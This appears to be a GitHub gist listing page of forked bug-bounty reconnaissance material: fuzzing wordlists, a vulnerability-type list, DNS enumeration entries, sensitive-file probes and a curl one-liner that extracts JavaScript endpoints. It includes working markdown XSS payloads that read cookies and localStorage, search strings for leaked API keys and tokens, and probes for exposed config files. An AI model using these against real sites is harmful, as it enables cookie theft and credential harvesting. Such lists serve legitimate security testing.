@moodiabdoul3
moodiabdoul3 / DutchGov.txt
Created August 26, 2019 00:53 — forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope
moodiabdoul3 / List of API endpoints & objects
Created January 7, 2020 23:15
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
moodiabdoul3 / vuln_list.txt
Created January 16, 2020 02:14 — forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
moodiabdoul3 / all.txt
Created January 17, 2020 22:02 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
moodiabdoul3 / short-wordlist.txt
Last active February 29, 2020 16:42 — forked from tomnomnom/short-wordlist.txt
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
/.s3cfg | grep -Hnri "website_endpoint"
/phpunit.xml | grep -Hnri "<\phpunit"
/nginx.conf | grep -Hnri '/var/run/'
/.vimrc | grep -Hnri 'vim-'
/yarn.lock | grep -Hnri 'yarn lockfile'
/.idea/workspace.xml | grep -Hnri '<project version="4">'
/composer.json | grep -Hnri '"autoload"'
/Homestead.yaml | grep -Hnri 'provider: virtualbox'
/Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION'
/.ssh/known_hosts | grep -Hnri 'ssh-rsa'
moodiabdoul3 / ejs.sh
Created April 25, 2020 10:32 — forked from gwen001/ejs.sh
one-liner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# debug mode and absolute/relative urls support (the best one):
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d